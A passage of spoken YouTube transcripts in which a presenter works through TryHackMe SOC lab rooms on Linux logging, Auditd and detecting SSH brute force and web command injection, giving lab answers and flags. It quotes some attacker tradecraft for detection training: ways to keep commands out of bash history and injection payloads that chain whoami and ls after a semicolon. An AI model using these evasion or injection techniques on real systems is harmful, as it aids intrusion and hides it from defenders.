Hey everybody, welcome back to my channel. This is WireDogSec back with another video for you guys. Today's video, we are on TryHackMe, SOC Level 1 Learning Path, Linux Security Monitoring Module, Linux Logging for SOC Room. Explore key Linux log sources and learn how to use them in your SOC triage. Let's take a look at what they're cooking with today. Linux has long been a leader in servers and embedded systems, and now its use is even more widespread with the growth of cloud adoption. As a SOC analyst, you are now very likely to investigate Linux alerts and incidents either from traditional on-premises servers or from on-cloud or cloud-native containerized workloads. In this room, you will explore the most common Linux logs sent to the SIM and learn how to view them directly on host learning objectives. Explore authentication, runtime, and system logs on Linux. Learn the commands and pitfalls when working with logs. Uncover how tools like Auditd monitor and report the events. Practice every learned log source in the attached VM. Recommended rooms. Complete the Linux fundamentals module. Complete the Linux shells room. Learn the logs fundamentals. So check out my channel for videos related to this particular information. Machine access. This is how you access the machine. I already clicked the start machine button. As you can see here, it's already booted up here. And also, it says that you may need to work as the root user for some tasks. To switch to root on the VM, please run sudo su, okay? And here's an alternative way of accessing the VM. You can do it with VPN using these credentials and instructions. Okay, so we're ready to start, but if you want to help support the channel, be sure to like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Without further delay, let's go ahead and dive into it. Task 2. Working with text logs. Log format. Contrary to a common belief, Linux-based systems are not immune to malware. Moreover, Linux-targeted intrusions are a growing problem. Thus, as a SOC analyst, you will often need to investigate Linux alerts, and for this, you need to understand how its logging works. Now, let's clarify a couple of things and move on. By Linux, the room refers to Linux distributions like Debian, Ubuntu, CentOS, or RHEL, which is Red Hat Linux, Red Hat Enterprise Linux. The room focuses on Linux servers without a GUI, so no GUI, no graphical user interface, and does not explain desktop logging. Working with logs, unlike in Windows, Linux logs most events into plain text files. This means you can read the logs via any text editor without the need for specialized tools like Event Viewer. On the other hand, default Linux logs are less structured as there are no event codes and strict log formatting rules. Most Linux logs are located in the var log folder. So let's start the journey by checking var log syslog file, an aggregated stream of various system events. So here's an example of that here, and they're using the head command on that. Okay, so I'm going to follow along, get this ready to go. All right, so let's go ahead and clear the screen here, paste that in there. There we go. So let's see what they're cooking with here. All right, so this is the first, looks like the first few lines here because they're using the head command there. They're piping it into head, and we see our results here as well. Okay, and then if you want the opposite, you want to see the bottom, you can do tail on it. Okay, so just an example there. Filtering logs. You will see thousands of events when reading the syslog file on the attached VM, but only a few are useful for SOC. That's why you must filter logs and narrow down your search as much as possible. For example, you can use the grep command to filter on the cron keyword and see only cron job logs, and that's what they did here. Okay, they said grep-v cron to exclude cron from the results. Okay, so that's the opposite of that. So we're going to search on cron here because that's what we want to see. All right, so clear the screen again, paste it in. There we go. And also, if you want this to be a little bit slower, you can do something like this. You can do more on it. Okay, well, that didn't work as I thought it was going to. Let's try this here. We will maybe something like this. Okay, all right, so we're going to switch this back to cat. I'm trying to get my syntax correct here. Cron. And then we're going to pipe it into more. There we go. Okay, so now we can go by little, so it doesn't just all the way go through. And then if you want to get out of this, just hit Q. All right, you can do less on it as well. can use something similar. So if you want to do less, all right, same thing, hit Q to get out of it. So just some tidbits there to take into consideration. Okay, and if they wanted to exclude cron, they did a -v on it. So let's do that with this here. We'll get rid of this other stuff, so don't need it. And then it said -v, -v if I can type correctly. There we go. So now we're getting all this other stuff back that's not cron related. All right, so now we got that working. Discovering logs. Lastly, let's say you hunt for all user logins but don't know where to look for them. Linux system logs are stored in var log folder in plain text, so you can simply grep for related keywords like login, auth, or session in all log files and narrow down your next searches. Okay, so it says list what's logged by your system, var log, and then folder, ls, var log. So they're listing everything that's in that directory here. So let's see what's in there. There we go. Okay, cool. Search for potential logins across all logs, and this is what they're doing here. So let's see what we will come back with. There we go. And also, you can put this into like a file. So say like log review dot text. You put that into a file so it'll be easier to reference. You have all your stuff saved into that file. All right, let's see here. Log and caveats. Unlike Windows, Linux allows you to easily change log format, verbosity, and storage location. Hundreds of Linux distributions, each known to slightly customize logging. Be prepared that the logs in this room may look different on your system or might not exist at all. All right, so here's some questions here. So let's see. Use the var log syslog file on the VM to answer the questions. Which time server domain did the VM contact to sync its time? What is the kernel message from yammer and var log syslog? So y'all know what to do. Go ahead and try to answer the question yourself by pausing the video. And then once you're done, come back to the video and we will proceed forward. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos. You can see here over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking, enjoy the video. All right, so let's take a look at these questions here. Which time server domain did the VM contact to sync its time? So now you can use grep and then look for time sync. If you get stuck, you can always click these hints here. Okay, it'll tell you where to look here. It says you can search on time sync using grep. So that's exactly what I did. Time sync, enter, and then you can see that it's going to this ntp.ubuntu.com. So there's our answer for that one. Next one, what kernel message from yammer and var log syslog? So basically the same thing, except for you're going to grep on yammer instead of time sync. And there you go, becoming mindful. All right, test number 3, authentication logs. The first and often the most useful log file you want to monitor is var log auth.log or var log secure on RHEL-based systems. Although its name suggests it contains authentication events, it can also store user managed events, launch sudo commands, and much more. Let's start with the log file format. So here's an example: authentication events for var log auth.log, event time, host name, process ID, message from the process can be of any format. So filled password for admin, accepted public key from Bob, Pam, etc., etc. So some good information there. Login and log out events. There are many ways users authenticate into a machine, a Linux machine, locally via SSH using sudo or su commands, or automatically to run a cron job. Each successful logon and log off is logged, and you can see them by filtering the events containing the session open or session closed keywords. Okay, so we're gonna go ahead and get this ready to go here, and they are searching for session open, session closed, and let's see if we get anything interesting back for this. Okay, all kinds of stuff. All right, so we have similar results. It says local on keyboard login and log out of Bob. remote logon, examples of alice, SSH, and then SMB. So some interesting things to take note of here. Samba, SMB, okay. Cron and sudo logins. So if we want to search on that, we can use this information here. It says traces of some cron job launching, running as root. And it says Carol running sudo su to access root. So we can see that here. Okay. And let's clear all this stuff out. There we go. So we have some interesting results as well, looks like. All right. So just take note of these commands. We'll probably have to use these to answer questions. In addition to the system logs, the SSH daemon stores its own log of successful and failed SSH logins. And these logs are sent to the same auth.log file, but have a slightly different format. Let's see the example of 2 failed and 1 successful SSH logon. So let's go ahead and see common SSH log format is successful auth method for user, then IP address there, failed password for root, IP address, etc., etc. Okay, so let's take a look at this then. There we go. Public key, password, admin supports. Interesting there. Okay, awesome. Miscellaneous events. You can also use the same log file to detect or detect user management events. This is easy if you know basic Linux commands. If user add is a command to add new users, look for a user add keyword to see user creation events. Below is an example of what you can see in the logs: password change, user deletion, and then privilege user creation. All right, so we're gonna grab this out of here and take a look. All right, it says password change for Ubuntu, new group, new user, add Xerxes, and then it says some other information here, password changed by root. Okay, interesting results there. Lastly, depending on system configuration and install packages, you may encounter some interesting or unexpected events. For example, you may find commands launched with sudo, which can help track malicious actions. An example below: the Ubuntu user use sudo to stop EDR, read firewall state, and finally access root via sudo su. Okay, so we're going to copy and see if we see anything interesting there. And you can see it right there. Ubuntu, and then command right there, stop EDR, status numbered, user bin su. Okay, so let's see if we have anything of interest here. There we go. Install zip, unzip. Okay. Some more questions here. Continue with the VM and use the var logged auth.log file. Which IP address failed to log in on multiple users via SSH? Which user was created and added to the sudo group? Okay, we've probably already done this, but go ahead and pause the video to answer the question yourself, come back to the video, and then we will proceed. All right, let's take a look at these questions here. Which IP address failed to log in on multiple users via SSH? And then which user was created and added to the sudo group? And we saw this earlier. So the first one you can get by looking at it via this here. There's probably other ways to do it, but we're just going to use what we just learned in this task here. Okay, you can look at the failed here, SSHD. Okay, you can see that it tried different users here, root. Then you have invalid user, admin support, etc. And you can see this IP address in question right there. So that's the first one. And then the second one, you can get with this one here. Okay, so we're going to go in and take a look at this particular area here. And you can see user add right there. And you can see new group name Xerxes, user mod Xerxes added to group sudo right there, shadow group sudo, and a bunch of other stuff. So there you go. Xerxes is going to be our answer for that one. Task number 4, common Linux logs. Generic system logs. Linux keeps track of many other events scattered across files of var log, kernel logs, network changes, service or cron runs, package installation, and many more. Their content and format can differ depending on the operating system, and the most common log files are var log kern.log, kernel messages and errors useful for more advanced investigations, var log syslog or var log messages, a consolidated stream of various Linux events, var log dpkg.log or var log apt, package manager logs, on Debian-based systems. You have var.log dnf.log or var.log yum.log package manager logs for RHEL-based systems. The listed logs are valuable for or during defer, but are rarely seen in a daily SOC routine, as they are often noisy and hard to parse. Still, if you want to dive deeper into how these logs work, check out the Linux Logs Investigation Defer Room, which is digital forensics and incident response. App-specific logs. In SOC, you might also monitor a specific program, and to do this effectively, you need to use its logs. For example, analyze database logs to see which queries were run, mail logs to investigate phishing, container logs to catch anomalies, and web server logs to know which pages were opened, when, and by whom. You will explore these logs in the upcoming modules, but to give an overview, here an example from the typical Nginx web server logs. So this is Nginx web access logs. Cat var log nginx access.log. Every log line corresponds to a web request to the server. So you can see they're doing get request post, get. You can see the HTTP responses and codes. So 200, 200, 302, 200, 403. Okay, so to try to get to the admin, and it looks like an access denied there. Bash history. Another valuable log source is bash, a feature that records each command you run after pressing enter. By default, commands are first stored in memory during your session and then written to the per user /bash history file when you log out. You can open the bash history file to review commands from previous sessions, or use history command to view commands from both your current and past session. So we could take a look at this way first, and they did echo hello world.text. Okay, so it's giving you the actual history of it, and then you can just do history as well. So let's try this first one, and then we'll do just history, see what we get back. Nice, okay. And we saw this earlier too. Oh wow, okay, well, there's a lot. Okay, well yeah, because this is the stuff I was running as well that's in here, this grep and other things down here. Yeah, okay, so that's good to know there. And let's see here. Although the bash history file looks like a vital log source, it is rarely used by SOC teams in their daily routine. This is because it does not track non-interactive commands like those initiated by your operating system, cron jobs, or web servers, and has some other limitations. While you can configure it to be more useful, there are still a few issues you should know about. So let's take a look at the bash history limitations. Hackers can simply add a leading space to the command to avoid being logged. So echo, you will never see me in the logs. Attackers can paste their command in a script to hide them from the bash history, nano legit.sh, and looks like they're running it. Attackers can use other shells like bin.sh that don't save the bash history, like bash. So sh echo, I'm no longer tracked by bash. Interesting. Okay, so that's some good tidbits to know about there. And once again, we have some questions here. Which version of unzip was installed on the system? What is the flag you see in one of the user's bash history? Awesome. So go ahead, pause the video, try to answer them yourself, come back to the video, and then we will proceed. Okay, let's take a look at these questions. Which version of unzip was installed on the system? What is the flag you see in one of the user's bash history? All right, so the first one here, you can cat var log dpkg.log pipe into grep, then unzip, and then you'll get the version in multiple places here. All right, so there's your answer for that one. Next one, you will have to actually switch users, okay? So you can do the switch user. So now I'm in root, and then we can go ahead and just cat the bash history file here, and then we can see the flag right there. Okay, there you go. To get out of this, you can just type in exit. All right, or you can switch back to Ubuntu. All right, so we're done with that. Task number 5, runtime monitoring. Up to this point, you have explored various Linux log sources, but none can reliably answer questions like which programs did Bob launch today, or who deleted my home folder, and when. That's because by default, Linux doesn't log process creation, file changes, or network-related events, collectively known as runtime events. Interestingly, Windows faces the same limitation, which is why the Windows logging for SOC room, we had to use an additional tool, Sysmon, and Linux will take a similar approach here. Okay, SOC analyst, the broader you log, the more threats you can detect and analyze, so monitor only, auth.log. Add weblog and bash history, but ignore runtime events. All right. System calls. Before moving on, let's explore a core operating system concept that might help you understand many other topics. System calls. In short, whenever you need it to open a file, create a process, access the camera, or request any other operating system service, you make a specific system call. There are over 300 system calls in Linux, like execve, to execute a program. Below is a high-level flowchart of how it works. So let's take a look here. Number 1, you start a program by typing who am I and pressing enter. Number 2, your shell starts user bin who am I by sending execve system call. Number 3, Linux kernel processes the details and starts the execve system call. Number 4, Linux kernel accesses hardware, CPU, memory, and disk. And then number 5, Linux kernel returns the results and you see who am I output. Why do you need to know about system calls? Well, all modern EDRs and logging tools rely on them. They monitor the main system calls and log the details in a human-readable format. Since there's nearly no way for attackers to bypass system calls, all you have to do is choose the system calls you like to monitor and log, and the next task you will try it and practice using Auditd. All right, so we have some more questions here. Which Linux system call is commonly used to execute a program? Which we just read about that here, that execve should be it here. So let's see if that's what they're looking for. Okay. Can a typical program open a file or create a process by bypassing system calls? No. It says they must go through it, right? Most of the time, if not all the time. All right, task number 6, using Auditd. Audit daemon. Audit daemon is a built-in auditing solution often used by the SOC team for runtime monitoring. This task, we will skip the configuration part and focus on how to read Auditd rules and how to interpret the results. Let's start from the rules instructions based or located in etc Auditd rules.d that define which system calls to monitor and which filters to apply. So Auditd rules, example, etc audit rules.d audit.rules. We'll take a look at this here. Always log what follows. Monitor this system call, apply these monitoring filters, apply these tags for easier search, just comment, not a part of the rules. Okay, that's interesting format there, layout. Monitoring every process, file, and network event can quickly produce gigabytes of logs each day. More logs don't always mean better detection, since an attack buried in a terabyte of noise is still invisible. That's why SOC teams often focus on the highest risk events and build balanced rule sets like this one, or the example you saw above. Using Auditd, you can view the generated logs in real time and var.log audit.d log, but it is easier to use the search or AU search command, as it formats the log or formats the output for better readability and supports filtering options. Let's see an example based on the rules from the example above by searching events matching the proc_wget key. Okay, so looking for wget execution, and let's see if we see anything in ours here. So we see some interesting results right there. Files.tryhackme.thm, report.zip. Okay, some other information right there. Oops, scroll over a little bit. All right, so let's see if we have anything interesting here. And okay, all kinds of stuff. A lot of stuff, actually. Look at all this. All right, cool. The terminal above shows a log of a single wget command. Here, Auditd splits the event into 4 lines. The proc title shows the process command line. CWD reports the current working directory. And the remaining 2 lines show the system calls details like PID 3888 and PPID 3752, process ID and parent process ID, helpful in linking events and building a process tree. AUID equals Ubuntu audit user, the account originally used to log in, whether locally, keyboard, or remotely, SSH. UID equals root, the user who ran the command. The field can differ from AUID if you use switched users with sudo or su. TTY equals PTS1, session identifier, helps distinguish events when multiple people work on the same Linux server. XE equals user bin wget, absolute path to the executed binary, often used to build SOC detection rules. Key equals proc_wget, optional tag specified by engineers in Auditd rules that is useful to filter the events. file events. Now let's look at the file events matching the file underscore SSH conf key. As you may see from the terminal below, Auditd tracked the change to etc sshd underscore config file via the nano command. SOC teams often set up rules to monitor changes in critical files and directories. Examples: SSH configuration files, cron job definitions, or system settings. Looking for SSH configuration changes. Okay, so that's interesting there. Let's take a look and see if we have anything of interest on our system. So let's get rid of all this stuff here and see. Okay, some results back here. All right, Auditd alternatives. You might have noticed an inconvenient output of Auditd. Although it provides a verbose logging, it is hard to read again and ingest into SIM. That's why SOC teams resort to alternative runtime logging solutions. For example, Sysmon for Linux, a perfect choice if you already work with Sysmon and love XML. I was going to mention this earlier as well. Falco, a modern open source solution ideal for monitoring containerized systems. OS Query, another popular choice. An interesting tool that can be broadly used for various security purposes. EDRs, most EDR solutions can track and monitor various Linux runtime events. The key to remember is that all listed tools work on the same principle, monitoring system calls. Once you've understood system calls, you will easily learn all the mentioned tools. This knowledge also helps you to handle advanced scenarios like understanding why certain actions were logged in a specific way or not logged at all. Now try to uncover a threat actor with process creation logs. For this task, continue with the VM and use the Auditd logs to answer the questions. You may need to use -search-i and grep commands for this task. Okay, so we are almost done, and we have these last few questions here. When was the secret.thm file opened for the first time? Month, date, year, hour, minutes, and seconds. Note access to this file is logged with the file underscore thm secret key. What is the original file name downloaded from? GitHub via wget. I think we saw something about GitHub earlier with this. Which network range was scanned using the downloaded tool. All right, awesome. So go ahead, per usual, pause the video, try to answer the questions yourself, comment to the video, and then we will proceed forward, and then we will close it out here. All right, so for this first one here, it says access to this log file is logged with the file underscore thm secret key. And remember, you can hit these hints here, and it'll give you some ideas of where to look here. So they're doing AU search on it. Next one, so some other details about AU search. So you get the gist of it. We're going to be using AU search with some things. Anyway, so for this one, I went ahead and switched users to the root users so I wouldn't run into any issues. And we're going to search this first one here, right? Piping it into grep and open, and then you can see it right here, syscall, audit, and then here's the time right there that we need to grab. Okay, and if you want to double check it, right there's our answer. Okay, next one, we're going to be looking for GitHub stuff, and then proc underscore wget key. All right, so we're going to take a look at that here. Let's get rid of all this stuff. All right, and I'm just going to up arrow for that one. This one, I looked for download. Okay, so AU search -i-k proc underscore wget, piped into grep, and then download. And as you can see here, the one in question is going to be this nabu, and then the rest of it after it. So grab that part of it here. Okay, nabu, and plug that in as your answer. Nabu underscore 2.3 yada yada yada. All right, so that's the name of the file. The next one here is going to be, let's go ahead and clear that out. So the last one here, we're just going to grep on the actual tool that was used here because it's asking about scanning activity here. Which network range was scanned using the downloaded tool? Dedicated key for this event, but it's still an Auditd log. So we just did a grep on the tool itself to get that information here. Right, so I use search-i, pipe into grep, then nabu, and then from here, as you're reading through here, you can see what is happening, right? And you can see the proc title right here, and then nabu was ran, and it's running against this subnet here, and you can see the other commands and information listed there, top ports, right? So go ahead and grab that right there and plug it in as our answer, and we are done. Task number 7, conclusion. Great job exploring the Linux log sources and this upcoming rooms. You will put this knowledge into action to trace and investigate a variety of threats targeting Linux systems. From the initial access to the final attack steps, you may need all learned log sources to fully uncover the breaches. Nice. Key takeaways. Linux logging can be chaotic, but it often stores enough details to detect the threat Logs are kept in var log folder by default and are usually stored in plain text. The top 3 log sources for SOC are auth.log, app specific logs, and runtime logs. Bash history is unreliable for SOC. Better use Auditd or an alternative solution. Complete the room. Awesome. So we are done with this room here, and hopefully you tagged along to the end of this video. I very appreciate it. Also, and if you want to help support the channel, it's absolutely free. All you have to do is like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Happy hacking, happy defending. Have a nice day. I'll see you later, and stay safe in the cyber trenches. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos that you can see here, over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking, enjoy the video. Hey everybody, welcome back to my channel. This is WireDogSec, back with another video for you guys. Today's video, we are in TryHackMe. This is the SOC Level 1 Learning Path, Linux Security Monitoring Module, Linux Threat Detection 1 Room. Explore how attackers break into Linux systems and how you can detect this in logs. Sounds very exciting here. Task number 1, Introduction. With the rise of AI, artificial intelligence, cloud computing, and the Internet of Things, Linux systems are getting even more popular than before. However, most Linux breaches start with common, well-known initial access techniques. In this room, you will explore how to detect these techniques using the log sources you learned in the Linux logging for SOC room, learning objectives, understand the role and risk of SSH in Linux environments, learn how internet exposed services can lead to breaches, utilize process tree analysis to identify the origin of the attack, practice detecting initial access techniques in realistic labs. Prerequisites: complete the Linux logging for SOC room, understand the concept of MITRE tactics and techniques, know how to navigate Linux without using a GUI, be ready for a deep dive into Linux threat detection. And not just Linux, you should learn how to utilize Windows without the GUI, okay? Get comfortable with the terminal, command line, what have you. Also, check out my channel for anything related to this information here. Most likely, I probably have a video covering it. Lab access. Here's the information on how to access the lab. I've already clicked the start machine button. As you can see here, it's fired up here, and it says here that to switch to root on the VM, please run sudo su. So it looks like we may need to do that in some cases. Credentials here. Alternatively, you can access the VM from your own VPN connected machine with the credentials below. So whatever your credentials are, IP address, whatever, you connect to it via SSH if you want to go that route. I'm ready to start. Yes, before we get into it, if you want to help support the channel, it's totally free. Just go ahead and like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Without further delay, let's go ahead and dive into it. Task 2, initial access via SSH. Popularity of SSH. One of the most popular initial access methods on Linux servers is an exposed SSH, a common remote access service used by IT teams worldwide. Nearly every internet-facing Linux machine has SSH enabled, with Shodan reporting over 40 million machines in 2025. Only some administrators enforce a secure key-based authentication, while others still rely on weak passwords and leave their systems vulnerable to brute force attacks. And here is a picture of Shodan. As you can see here, Shodan report, the United Kingdom alone has over 567,000 hosts, right? And you can see other countries listed here: China, United States, Germany, Netherlands, and the Russian Federation. Interesting. Initial access via SSH, much like with RDP on Windows, SSH is both powerful and often poorly defended. In fact, both protocols are tracked under the external remote services MITRE technique. A lot of threat groups run vast botnets to scan the internet for systems with exposed SSH and access them in two primary ways: via a stolen key or a breach password. Let's see how it usually happens. Number one, common risk when using key-based authentication. Threat actors access a service or source code where private SSH keys have been stored, like GitHub repository or Ansible automation server containing SSH credentials. Threat actors steal SSH keys to a server by infecting an admin's laptop with a data stealer. Number two, additional risks when using password-based authentication. An IT admin sets a weak SSH password for a quick test and forgets to revert the changes. And IT support enables SSH for a contractor who sets the password to 1, 2, 3, 4, 5, 6, 7, 8. A network engineer accidentally exposes an old insecure SSH server to the internet. Most real-world Linux attacks, such as those by the auth.log group, start from one of the scenarios above. However, you should be aware of more advanced risk like a vulnerability in SSH server itself, notably Erlang/OTP or SSH session hijacking, that you will learn in more advanced rooms. Okay, for this task, open the VM and remind yourself how to work with SSH logs. You can start from cat var log, auth.log, pipe that into grep, and then sshd in double quotes there. Okay, and we have questions right there. So if we wanted to take a look at that real quick, we'll just go ahead and grab it with Control C, and then we can clear the screen here and paste that in. And there we go. All right. So as usual, go ahead and pause the video, try to answer the questions yourself, and then come back to the video, and then we will proceed forward. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos. You can see here over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking. Enjoy the video. Let's take a look at these questions. When did the Ubuntu user log in via SSH for the first time? Did the Ubuntu user use SSH keys instead of a password for the above found date? Let's take a look here. You can reference this right here, which they gave us to start from. So go ahead and do that, and it'll pull back anything that has that in there, SSHD. If you go through and review this, there's quite a bit of information in here. You can also slim this down. Okay, let's just say that you just wanted to take a look at the auth logs in general. Well, you can do different commands. You can just cat it, right? Or you can use other commands like more to gradually navigate through it. As you can see there, hit Q to exit. You can use less as well. It works similarly to more there, right? Hit Q to exit out of there. You can also do something else here. If I can't remember what it was, but anyway, so you can cat that, and you can pipe that into grep like so in double quotes here. So we already saw SSHD, right? Well, let's just say you reviewed it and you saw that you only look for successful connections. Well, you can do something like accepted to filter that out, and now you can just go through and sift through this criteria here. And as you're navigating through here, you can see public key for Ubuntu, you can see the IP address, stuff like that. And if you go down a little bit more, you can see the actual time you need to grab here, which is 2024-10-2, and it says accepted public key from Ubuntu, or for Ubuntu from this IP address, yada, yada, yada. So we can see that they did use a public key to authenticate, and then also here's the date for that login, right, for that user. Okay, so we're done with that. Task number 3 here, detecting SSH attacks. Oh, that's what I was going to say here. I forgot. I just now remembered. Okay, so you can use other commands here like top on it, or not top, head on it, right? So you can get the first few lines there. You can do tail. This will work in any type of logs and stuff as well if it's like this. Okay, just some other interesting commands that can help you out as you're investigating logs. Okay, so SSH breach example. Now imagine a common real-world scenario. An IT administrator enables public SSH access to the server, allows password-based authentication, and sets a weak password for one of the support cases or users. Combined, these 3 actions inevitably lead to an SSH breach, as it's a matter of time before threat actors guess the password. The log sample below shows such a compromise, a brute force followed by a password breach. There are 3 indicators of malicious login to pay attention to. So let's take a look at this real quick and see what they're talking about. All right, so you see failed, and accepted right there for THM support from IP address, ports, and then SSH2. Multiple failed logins, followed by a success, logins from an external untrusted IP address, logins by password and insecure authentication method. 3 indicators confirming THM support breach. Detecting SSH attacks. On Linux, you don't need to learn a dozen fields like log on type to figure out what's going on. Making log analysis more straightforward. Your starting point in detecting SSH attacks can be as simple as listing all successful SSH logins and analyzing fill fields. Let's imagine you queried the logs and found 3 successful SSH logins, each of which could indicate an attack. How would you distinguish bad from good? So let's take a look at this. A successful SSH login. So they did a cat on auth.log, piped into grep-e, and then accepted to look for that right here. So it says accepted, public key for Ansible from this IP address, set the password for jsmith, set the password for jsmith, login of Ansible. The first login appears legitimate. It used public key authentication from an internal IP, likely an Ansible automation account. Moreover, the login at exactly 1400 matches periodic task behavior. But to be sure, you need to verify the 10.14.105.255 is an Ansible server and review the following users' activity for signs of a breach. Goes back to trust but verify. You see it in here. You trust that it is legitimate, but you need to verify with the applicable business units, the applicable IT admins, what have you. Logins of JSmith. The 2 logins of JSmith are more interesting, as there are 3 flags, red flags: password-based authentication, logins from external IPs, and time difference between the logins. One of the logins must be at night for the user, right? Still, to make a final verdict, you might need to investigate more details. So it says username, who owns the user? Is it expected for them to log in at this time and from this IP, source IP? What do TI tools, I guess threat intelligence tools, and asset lookups say about the IP? Is it trusted or malicious? Login history. Was the login preceded by brute force or other suspicious system events? Next steps. Is the login suspicious? Should I analyze user actions following the login? These are awesome steps to go about investigating logs such as this and activity that is deemed to be suspicious, right? So it goes back to trust but verify, and using threat intelligence sources like OSINT tools, things like that, to try to gather more contacts and information about the IP address comes in handy. Okay, let's continue on here. Now try to uncover the breach that started via SSH password brute force. For this task, continue with var log auth.log on the VM. Once again, we got some questions here, so pause the video, try to answer them yourself, comment to the video, and then we will proceed. Let's take a look at these questions. When did the SSH password brute force start? Which 4 users did the botnet attempt to breach? And you have to put them in alphabetical order. Finally, which IP managed to breach the root user? All right, so let's take a look and see if we can find this brute force activity. We are going to cat the auth.log and then pipe that into grep and look for failed. And right off the bat, we can see quite a few entries here, and you can see various different IPs. Okay, so that's where you want to pivot, or that's where I pivoted from. You're going to jot down these IP addresses here, and we're going to grep those to see what else came about inside of here. And also, you can see various different users being tried here. So you can see user Sol, you can see Roy was tried multiple times. You can see, of course, the root user was tried multiple times. Okay, and then you can see, let's see what else is in here. User, that's the last one. So now you have all 4 of those. So that answers the question here: root, Roy, Sol, and user. Now we need to find out when this activity started. Okay, so we can see that it had started right here, 2025 08/21. Is going to be our answer for that one. And it says finally which IP managed to breach the root user. Okay, so once again, like I said, you're gonna have to pivot off this information inside of here. So pivot off these IP addresses mentioned. All right, so that's what I did. I'm just going to up arrow here, and as we're navigating through them, so we'll take a look at this one here. You can see that this does not appear to be the one that we're looking for. It is brute force activity, but there's no successful login. So next, we're going to check the other ones. Okay, so let's check this .186, same result here. Okay, I don't see any successful ones. And then we're going to check this last one here, and you can see that there is an accepted right there for this one. Failed multiple times, and then you see the accepted one. So the answer for this one's going to be this .79 IP address. There we go. Task number 4. Initial access via services. Linux and public services. Linux systems often host public-facing services or applications such as web servers, email servers, databases, and various development or IT management tools. They also comprise the core of most firewall or VPN software. However, whenever one of these applications is compromised, the entire Linux host is at risk. This risk is covered with the T1190 MITRE technique. Let's see a few real-world examples. CV and Zimbra collaboration allowed the attackers to execute arbitrary OS commands, exposed Docker API port, acted as an entry point, and a series of cloud infrastructure breaches. CV and Palo Alto firewalls granted attackers full control over the Linux-based firewall's operating system. WordPress plugins feature often abused to upload malware-like web shells to the system. So let's take a look at this picture here. Attacker number 1, brute force exploit and secure WordPress website. WordPress website right here. 2, from WordPress, upload a backdoor to the Linux host, which is the server listed there. And WordPress is highly targeted, by the way. Using application logs, if you want to know whether your email server was breached, you naturally reach for the email logs. On the other hand, can you expect an application to log, I am being exploited with a 0-day right now? Of course not. That's the nature of application logs. They rarely tell the full story, but they can still provide unique artifacts. Analysis, for example, you can use weblogs to detect a variety of web attacks, use database logs to detect suspicious SQL queries, use VPN logs to detect abnormal VPN login events, and refer to other logs for specific events like bank transactions. Right, application logs are very useful though. They can tell you like error messages and other things inside of there, right, that can help you out in your investigation. So I recommend doing some research on application logs and how they can detect types of cyber attacks. Web as initial access. Any publicly exposed application can lead to a Linux breach, especially vulnerable web servers. Let's see an example. The IT team creates a simple web application called TryHackMe, where you can ping the specified IP online. Internally, the app runs a system command ping-c2 and then your input to test the connection without any input filtering, which is bad. The attackers would easily spot a command injection there, but can you spot the exploitation in the TryHackMe weblogs? So let's take a look at those weblogs here. So we're catting this var log nginx access.log. See here, ping host equals IP address 200, code there 500 500. Here you can see they are starting to poke around here a bit. They're using hello data who am I, added some a semicolon in there, who am I, and then another semicolon ls to see if what comes back. Web log analysis, the request coming from 10.14.105.255 seem odd. Instead of IPs, the client puts Linux commands inside the query parameters, a clear sign of command injection, although now you will need to start a deep investigation to unravel the whole history. From web logs alone, you can assume that the .255 is likely the attacker's IP. The ping page is vulnerable and allows code execution. The attacker executed operating system commands like who am I and ls. The entire system is now at risk because of the TryHackMe vulnerability. Can you analyze TryHackMe web logs to detect the attacker's actions? So we're going to be using var log nginx access.log on the VM to answer these questions. So y'all know what to do. Go ahead and try to answer these questions yourself, and then come back to the video and we will proceed forward. All right, this one was pretty straightforward and pretty easy to answer. Let's take a look. What is the path to the Python file the attacker attempted to open? Looking inside the open file, what's the flag you see there? So once again, we're going to take a look at var log nginx access.log. So we're just going to do a cat on it, and there's not that many entries inside of here, but you can see what we were talking about earlier. You can see who am I ls pwd, which is print working directory, and you can see a cat there where they're trying to open up this file, which is right located here, opt trypingme and then main.py. Okay. And it looks like they did some other stuff here as well. It looks like maybe a shell, reverse shell or something, right, from what I could tell. But anyway, so now we have the file in question. We saw what they did, and this is going to be the answer for that one. So opt try ping me and then main.py there. Okay, next one is we're going to do a cat on that file and to get that flag. Okay, so you can just highlight it, the directory here. Well, you can plug in cat first and then highlight it and then just right click and it should paste it in there for you like so. And there you go. There's the flag right there. THM, I am vulnerable. Awesome. But I would definitely take a look at what happened afterwards here. Okay. To me, this looks like a reverse shell of some kind. All right, so let's go ahead and continue on here. Task number 5, detecting service breach. Building process tree. One way to detect a service breach is to use application logs like you did in the previous task. But remember, application logs are not always available or helpful. Instead, most SOC teams rely on process tree analysis, a universal approach to unwrapping the initial access. For example, in this report, Wiz used a process tree to visually highlight how exactly Selenium servers were breached and how to spot it in process creation logs. A common SOC scenario is when you receive an alert about a suspicious command. Let's say, who am I? Why was it executed? Due to IT activity or maybe a service breach? To answer this, all you need is to build a process tree and trace the command back to its parent process as shown in the image below. Okay, so let's take a look at process tree usage to uncover initial access 3. You search for a process with the PID of 3898. Looks like it all started from a Python web app here. Okay, number 2, you search for a process with PID of 